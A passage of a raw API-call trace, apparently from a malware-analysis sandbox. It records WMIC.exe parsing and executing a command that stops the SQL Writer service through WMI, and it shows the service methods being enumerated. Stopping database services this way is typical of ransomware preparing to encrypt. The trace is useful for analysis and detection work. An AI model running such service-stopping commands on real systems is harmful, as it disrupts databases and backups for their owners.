SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0246.140] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.140] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0246.140] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.140] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0246.140] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0246.140] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.140] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0246.140] malloc (_Size=0x30) returned 0x358580 [0246.141] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.141] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.141] IUnknown:Release (This=0x22da280) returned 0x0 [0246.141] IUnknown:Release (This=0x22d9cc0) returned 0x0 [0246.141] FreeThreadedDOMDocument:IUnknown:Release (This=0x22dbc50) returned 0x1 [0246.141] FreeThreadedDOMDocument:IUnknown:Release (This=0x22d71d0) returned 0x0 [0246.141] free (_Block=0x356f40) [0246.141] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice" [0246.141] malloc (_Size=0xe0) returned 0x356f00 [0246.141] memcpy_s (in: _Destination=0x356f00, _DestinationSize=0xde, _Source=0x825ee, _SourceSize=0xd4 | out: _Destination=0x356f00) returned 0x0 [0246.141] malloc (_Size=0x18) returned 0x35caa0 [0246.141] malloc (_Size=0x18) returned 0x35cac0 [0246.141] malloc (_Size=0x18) returned 0x35cae0 [0246.141] malloc (_Size=0x18) returned 0x35cb00 [0246.142] malloc (_Size=0x80) returned 0x35cd30 [0246.142] GetLocalTime (in: lpSystemTime=0x26f970 | out: lpSystemTime=0x26f970*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x4, wMilliseconds=0x3b8)) [0246.142] _vsnwprintf (in: _Buffer=0x35cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26f8c8 | out: _Buffer="04-28-2020T20:42:04") returned 19 [0246.142] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.142] malloc (_Size=0x90) returned 0x35cdc0 [0246.142] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.142] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.142] malloc (_Size=0x90) returned 0x35ce60 [0246.142] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.142] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.142] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.142] malloc (_Size=0xa) returned 0x35cb20 [0246.142] lstrlenW (lpString="path") returned 4 [0246.142] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0246.142] malloc (_Size=0xa) returned 0x35cb40 [0246.142] malloc (_Size=0x8) returned 0x357150 [0246.142] free (_Block=0x0) [0246.142] free (_Block=0x35cb20) [0246.142] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.142] malloc (_Size=0x1c) returned 0x35cf00 [0246.142] lstrlenW (lpString="Win32_Service") returned 13 [0246.142] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0246.142] malloc (_Size=0x1c) returned 0x35cf30 [0246.142] malloc (_Size=0x10) returned 0x35cb20 [0246.142] memmove_s (in: _Destination=0x35cb20, _DestinationSize=0x8, _Source=0x357150, _SourceSize=0x8 | out: _Destination=0x35cb20) returned 0x0 [0246.142] free (_Block=0x357150) [0246.143] free (_Block=0x0) [0246.143] free (_Block=0x35cf00) [0246.143] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.143] malloc (_Size=0xc) returned 0x35cb60 [0246.143] lstrlenW (lpString="where") returned 5 [0246.143] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0246.143] malloc (_Size=0xc) returned 0x35cb80 [0246.143] malloc (_Size=0x18) returned 0x35cba0 [0246.143] memmove_s (in: _Destination=0x35cba0, _DestinationSize=0x10, _Source=0x35cb20, _SourceSize=0x10 | out: _Destination=0x35cba0) returned 0x0 [0246.143] free (_Block=0x35cb20) [0246.143] free (_Block=0x0) [0246.143] free (_Block=0x35cb60) [0246.143] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.143] malloc (_Size=0x38) returned 0x3585c0 [0246.143] lstrlenW (lpString="\"name like '%%SQLWriter%%'\"") returned 27 [0246.143] _wcsicmp (_String1="\"name like '%%SQLWriter%%'\"", _String2="\"NULL\"") returned -20 [0246.143] lstrlenW (lpString="\"name like '%%SQLWriter%%'\"") returned 27 [0246.143] lstrlenW (lpString="\"name like '%%SQLWriter%%'\"") returned 27 [0246.143] malloc (_Size=0x38) returned 0x358600 [0246.143] malloc (_Size=0x20) returned 0x35cf00 [0246.143] memmove_s (in: _Destination=0x35cf00, _DestinationSize=0x18, _Source=0x35cba0, _SourceSize=0x18 | out: _Destination=0x35cf00) returned 0x0 [0246.143] free (_Block=0x35cba0) [0246.143] free (_Block=0x0) [0246.143] free (_Block=0x3585c0) [0246.143] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.143] malloc (_Size=0xa) returned 0x35cba0 [0246.143] lstrlenW (lpString="call") returned 4 [0246.144] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0246.144] malloc (_Size=0xa) returned 0x35cb60 [0246.144] malloc (_Size=0x30) returned 0x3585c0 [0246.144] memmove_s (in: _Destination=0x3585c0, _DestinationSize=0x20, _Source=0x35cf00, _SourceSize=0x20 | out: _Destination=0x3585c0) returned 0x0 [0246.144] free (_Block=0x35cf00) [0246.144] free (_Block=0x0) [0246.144] free (_Block=0x35cba0) [0246.144] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 71 [0246.144] malloc (_Size=0x18) returned 0x35cba0 [0246.144] lstrlenW (lpString="stopservice") returned 11 [0246.144] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0246.144] malloc (_Size=0x18) returned 0x35cb20 [0246.144] free (_Block=0x0) [0246.144] free (_Block=0x35cba0) [0246.144] malloc (_Size=0x30) returned 0x358640 [0246.144] lstrlenW (lpString="QUIT") returned 4 [0246.144] lstrlenW (lpString="path") returned 4 [0246.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0246.144] lstrlenW (lpString="EXIT") returned 4 [0246.144] lstrlenW (lpString="path") returned 4 [0246.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0246.144] free (_Block=0x358640) [0246.144] WbemLocator:IUnknown:AddRef (This=0x1da1390) returned 0x2 [0246.144] malloc (_Size=0x30) returned 0x358640 [0246.144] lstrlenW (lpString="/") returned 1 [0246.145] lstrlenW (lpString="path") returned 4 [0246.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0246.145] lstrlenW (lpString="-") returned 1 [0246.145] lstrlenW (lpString="path") returned 4 [0246.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0246.145] lstrlenW (lpString="CLASS") returned 5 [0246.145] lstrlenW (lpString="path") returned 4 [0246.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0246.145] lstrlenW (lpString="PATH") returned 4 [0246.145] lstrlenW (lpString="path") returned 4 [0246.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0246.145] lstrlenW (lpString="/") returned 1 [0246.145] lstrlenW (lpString="Win32_Service") returned 13 [0246.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0246.145] lstrlenW (lpString="-") returned 1 [0246.145] lstrlenW (lpString="Win32_Service") returned 13 [0246.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0246.145] lstrlenW (lpString="Win32_Service") returned 13 [0246.145] malloc (_Size=0x1c) returned 0x35cf00 [0246.145] lstrlenW (lpString="Win32_Service") returned 13 [0246.145] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0246.145] lstrlenW (lpString="Win32_Service") returned 13 [0246.145] malloc (_Size=0x1c) returned 0x357150 [0246.146] lstrlenW (lpString="Win32_Service") returned 13 [0246.146] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xfffffffffff16680 | out: _String=0x0, _Context=0xfffffffffff16680) returned 0x0 [0246.146] lstrlenW (lpString="") returned 0 [0246.146] lstrlenW (lpString="WHERE") returned 5 [0246.146] lstrlenW (lpString="where") returned 5 [0246.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0246.146] lstrlenW (lpString="/") returned 1 [0246.146] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0246.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLWriter%%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0246.146] lstrlenW (lpString="-") returned 1 [0246.146] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0246.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLWriter%%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0246.146] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0246.146] malloc (_Size=0x34) returned 0x358680 [0246.146] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0246.146] lstrlenW (lpString="/") returned 1 [0246.146] lstrlenW (lpString="call") returned 4 [0246.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0246.146] lstrlenW (lpString="-") returned 1 [0246.146] lstrlenW (lpString="call") returned 4 [0246.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0246.146] lstrlenW (lpString="call") returned 4 [0246.146] malloc (_Size=0xa) returned 0x35cba0 [0246.146] lstrlenW (lpString="call") returned 4 [0246.146] lstrlenW (lpString="GET") returned 3 [0246.146] lstrlenW (lpString="call") returned 4 [0246.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0246.147] lstrlenW (lpString="LIST") returned 4 [0246.147] lstrlenW (lpString="call") returned 4 [0246.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0246.147] lstrlenW (lpString="SET") returned 3 [0246.147] lstrlenW (lpString="call") returned 4 [0246.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0246.147] lstrlenW (lpString="CREATE") returned 6 [0246.147] lstrlenW (lpString="call") returned 4 [0246.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0246.147] lstrlenW (lpString="CALL") returned 4 [0246.147] lstrlenW (lpString="call") returned 4 [0246.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0246.147] lstrlenW (lpString="/") returned 1 [0246.147] lstrlenW (lpString="stopservice") returned 11 [0246.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0246.147] lstrlenW (lpString="-") returned 1 [0246.147] lstrlenW (lpString="stopservice") returned 11 [0246.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0246.147] lstrlenW (lpString="stopservice") returned 11 [0246.147] malloc (_Size=0x18) returned 0x35cbc0 [0246.147] lstrlenW (lpString="stopservice") returned 11 [0246.147] ??0CHString@@QEAA@XZ () returned 0x26d518 [0246.147] GetCurrentThreadId () returned 0xbc0 [0246.147] GetCurrentThreadId () returned 0xbc0 [0246.148] ??0CHString@@QEAA@XZ () returned 0x26d2e8 [0246.148] malloc (_Size=0x8) returned 0x35cf60 [0246.148] malloc (_Size=0x18) returned 0x35cbe0 [0246.148] malloc (_Size=0x18) returned 0x35cc00 [0246.148] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffc62950 | out: ppNamespace=0xffc62950*=0x1db3a98) returned 0x0 [0246.214] free (_Block=0x35cc00) [0246.214] CoSetProxyBlanket (pProxy=0x1db3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0246.214] free (_Block=0x35cf60) [0246.214] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0246.214] free (_Block=0x35cbe0) [0246.214] malloc (_Size=0x18) returned 0x35cbe0 [0246.214] IWbemServices:GetObject (in: This=0x1db3a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x26d4f8*=0x0, ppCallResult=0x0 | out: ppObject=0x26d4f8*=0x1ddbfa0, ppCallResult=0x0) returned 0x0 [0246.234] free (_Block=0x35cbe0) [0246.234] IWbemClassObject:BeginMethodEnumeration (This=0x1ddbfa0, lEnumFlags=0) returned 0x0 [0246.234] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="StartService", ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x1ddc4a0) returned 0x0 [0246.234] lstrlenW (lpString="StartService") returned 12 [0246.235] lstrlenW (lpString="stopservice") returned 11 [0246.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0246.235] IUnknown:Release (This=0x1ddc4a0) returned 0x0 [0246.235] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="StopService", ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x1ddc4a0) returned 0x0 [0246.235] lstrlenW (lpString="StopService") returned 11 [0246.235] lstrlenW (lpString="stopservice") returned 11 [0246.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0246.235] malloc (_Size=0x70) returned 0x35cf60 [0246.235] ??0CHString@@QEAA@XZ () returned 0x26cea8 [0246.235] GetCurrentThreadId () returned 0xbc0 [0246.235] IWbemClassObject:GetNames (in: This=0x1ddc4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x26cea0 | out: pNames=0x26cea0*="\x01ƀ\x08") returned 0x0 [0246.235] SafeArrayGetLBound (in: psa=0x124af0, nDim=0x1, plLbound=0x26ceb8 | out: plLbound=0x26ceb8) returned 0x0 [0246.235] SafeArrayGetUBound (in: psa=0x124af0, nDim=0x1, plUbound=0x26ceb4 | out: plUbound=0x26ceb4) returned 0x0 [0246.235] SafeArrayGetElement (in: psa=0x124af0, rgIndices=0x26ce94, pv=0x26ce98 | out: pv=0x26ce98) returned 0x0 [0246.235] malloc (_Size=0x48) returned 0x35cfe0 [0246.236] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1ddc4a0, wszProperty="ReturnValue", ppQualSet=0x26cce8 | out: ppQualSet=0x26cce8*=0x1da13b0) returned 0x0 [0246.236] malloc (_Size=0x18) returned 0x35cbe0 [0246.236] IWbemQualifierSet:Get (in: This=0x1da13b0, wszName="CIMTYPE", lFlags=0, pVal=0x26cd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x26cd70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0246.236] free (_Block=0x35cbe0) [0246.236] malloc (_Size=0x18) returned 0x35cbe0 [0246.236] IWbemClassObject:Get (in: This=0x1ddc4a0, wszName="ReturnValue", lFlags=0, pVal=0x26ce18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x26ccf8*=2542912, plFlavor=0x0 | out: pVal=0x26ce18*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x26ccf8*=19, plFlavor=0x0) returned 0x0 [0246.236] malloc (_Size=0x18) returned 0x35cc00 [0246.236] IWbemQualifierSet:Get (in: This=0x1da13b0, wszName="read", lFlags=0, pVal=0x26cd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc62ac0), plFlavor=0x0 | out: pVal=0x26cd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc62ac0), plFlavor=0x0) returned 0x80041002 [0246.236] free (_Block=0x35cc00) [0246.236] malloc (_Size=0x18) returned 0x35cc00 [0246.237] IWbemQualifierSet:Get (in: This=0x1da13b0, wszName="write", lFlags=0, pVal=0x26cd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc62ac0), plFlavor=0x0 | out: pVal=0x26cd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc62ac0), plFlavor=0x0) returned 0x80041002 [0246.237] free (_Block=0x35cc00) [0246.237] malloc (_Size=0x18) returned 0x35cc00 [0246.237] malloc (_Size=0x18) returned 0x35cc20 [0246.237] IWbemQualifierSet:Get (in: This=0x1da13b0, wszName="Description", lFlags=0, pVal=0x26cdb0*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc04293, varVal2=0x26cdb8), plFlavor=0x0 | out: pVal=0x26cdb0*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc04293, varVal2=0x26cdb8), plFlavor=0x0) returned 0x80041002 [0246.237] free (_Block=0x35cc20) [0246.237] malloc (_Size=0x18) returned 0x35cc20 [0246.237] lstrlenA (lpString="Not Available") returned 13 [0246.237] malloc (_Size=0x1c) returned 0x35d030 [0246.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffbf22f0, cbMultiByte=-1, lpWideCharStr=0x35d030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0246.237] free (_Block=0x35d030) [0246.237] IUnknown:Release (This=0x1da13b0) returned 0x0 [0246.237] malloc (_Size=0x48) returned 0x35d030 [0246.237] malloc (_Size=0x18) returned 0x35cc40 [0246.237] malloc (_Size=0x48) returned 0x35d080 [0246.237] malloc (_Size=0x70) returned 0x35d0d0 [0246.237] malloc (_Size=0x48) returned 0x35d150 [0246.237] free (_Block=0x35d080) [0246.237] free (_Block=0x35d030) [0246.238] free (_Block=0x35cfe0) [0246.238] free (_Block=0x35cc00) [0246.238] free (_Block=0x35cc20) [0246.238] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0246.238] IWbemClassObject:GetMethodQualifierSet (in: This=0x1ddbfa0, wszMethod="StopService", ppQualSet=0x26d418 | out: ppQualSet=0x26d418*=0x1da13b0) returned 0x0 [0246.238] malloc (_Size=0x18) returned 0x35cc20 [0246.238] IWbemQualifierSet:Get (in: This=0x1da13b0, wszName="Implemented", lFlags=0, pVal=0x26d428*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d412c924f82, varVal2=0xffc044fb), plFlavor=0x0 | out: pVal=0x26d428*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d412c924f82, varVal2=0xffc044fb), plFlavor=0x0) returned 0x80041002 [0246.238] free (_Block=0x35cc20) [0246.238] malloc (_Size=0x18) returned 0x35cc20 [0246.238] malloc (_Size=0x18) returned 0x35cc00 [0246.238] IWbemQualifierSet:Get (in: This=0x1da13b0, wszName="Description", lFlags=0, pVal=0x26d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc62948, varVal2=0xbc0), plFlavor=0x0 | out: pVal=0x26d440*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xbc0), plFlavor=0x0) returned 0x0 [0246.238] free (_Block=0x35cc00) [0246.238] malloc (_Size=0x18) returned 0x35cc00 [0246.239] IUnknown:Release (This=0x1da13b0) returned 0x0 [0246.239] malloc (_Size=0x70) returned 0x35cfe0 [0246.239] malloc (_Size=0x70) returned 0x35d1a0 [0246.239] malloc (_Size=0x48) returned 0x35d060 [0246.239] malloc (_Size=0x18) returned 0x35cc60 [0246.239] malloc (_Size=0x70) returned 0x35d220 [0246.239] malloc (_Size=0x70) returned 0x35d2a0 [0246.239] malloc (_Size=0x48) returned 0x35d320 [0246.239] malloc (_Size=0x50) returned 0x35d370 [0246.239] malloc (_Size=0x70) returned 0x35d3d0 [0246.239] malloc (_Size=0x70) returned 0x35d450 [0246.239] malloc (_Size=0x48) returned 0x35d4d0 [0246.239] free (_Block=0x35d320) [0246.239] free (_Block=0x35d2a0) [0246.239] free (_Block=0x35d220) [0246.239] free (_Block=0x35d060) [0246.239] free (_Block=0x35d1a0) [0246.239] free (_Block=0x35cfe0) [0246.239] IUnknown:Release (This=0x1ddc4a0) returned 0x0 [0246.239] free (_Block=0x35d150) [0246.239] free (_Block=0x35d0d0) [0246.239] free (_Block=0x35cf60) [0246.239] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="PauseService", ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x1ddc4a0) returned 0x0 [0246.239] lstrlenW (lpString="PauseService") returned 12 [0246.239] lstrlenW (lpString="stopservice") returned 11 [0246.239] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0246.239] IUnknown:Release (This=0x1ddc4a0) returned 0x0 [0246.239] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="ResumeService", ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x1ddc4a0) returned 0x0 [0246.239] lstrlenW (lpString="ResumeService") returned 13 [0246.240] lstrlenW (lpString="stopservice") returned 11 [0246.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0246.240] IUnknown:Release (This=0x1ddc4a0) returned 0x0 [0246.240] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="InterrogateService", ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x1ddc4a0) returned 0x0 [0246.240] lstrlenW (lpString="InterrogateService") returned 18 [0246.240] lstrlenW (lpString="stopservice") returned 11 [0246.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0246.240] IUnknown:Release (This=0x1ddc4a0) returned 0x0 [0246.240] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="UserControlService", ppInSignature=0x26d4e0*=0x1ddc520, ppOutSignature=0x26d4e8*=0x1ddca20) returned 0x0 [0246.240] lstrlenW (lpString="UserControlService") returned 18 [0246.240] lstrlenW (lpString="stopservice") returned 11 [0246.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0246.240] IUnknown:Release (This=0x1ddc520) returned 0x0 [0246.240] IUnknown:Release (This=0x1ddca20) returned 0x0 [0246.240] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="Create", ppInSignature=0x26d4e0*=0x1dde470, ppOutSignature=0x26d4e8*=0x1dde970) returned 0x0 [0246.241] lstrlenW (lpString="Create") returned 6 [0246.241] lstrlenW (lpString="stopservice") returned 11 [0246.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0246.241] IUnknown:Release (This=0x1dde470) returned 0x0 [0246.241] IUnknown:Release (This=0x1dde970) returned 0x0 [0246.241] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="Change", ppInSignature=0x26d4e0*=0x1dde1f0, ppOutSignature=0x26d4e8*=0x1dde6f0) returned 0x0 [0246.241] lstrlenW (lpString="Change") returned 6 [0246.241] lstrlenW (lpString="stopservice") returned 11 [0246.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0246.241] IUnknown:Release (This=0x1dde1f0) returned 0x0 [0246.241] IUnknown:Release (This=0x1dde6f0) returned 0x0 [0246.241] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="ChangeStartMode", ppInSignature=0x26d4e0*=0x1ddc610, ppOutSignature=0x26d4e8*=0x1ddcb10) returned 0x0 [0246.241] lstrlenW (lpString="ChangeStartMode") returned 15 [0246.241] lstrlenW (lpString="stopservice") returned 11 [0246.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0246.241] IUnknown:Release (This=0x1ddc610) returned 0x0 [0246.241] IUnknown:Release (This=0x1ddcb10) returned 0x0 [0246.241] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="Delete", ppInSignature=0x26d4e0*=0x0, 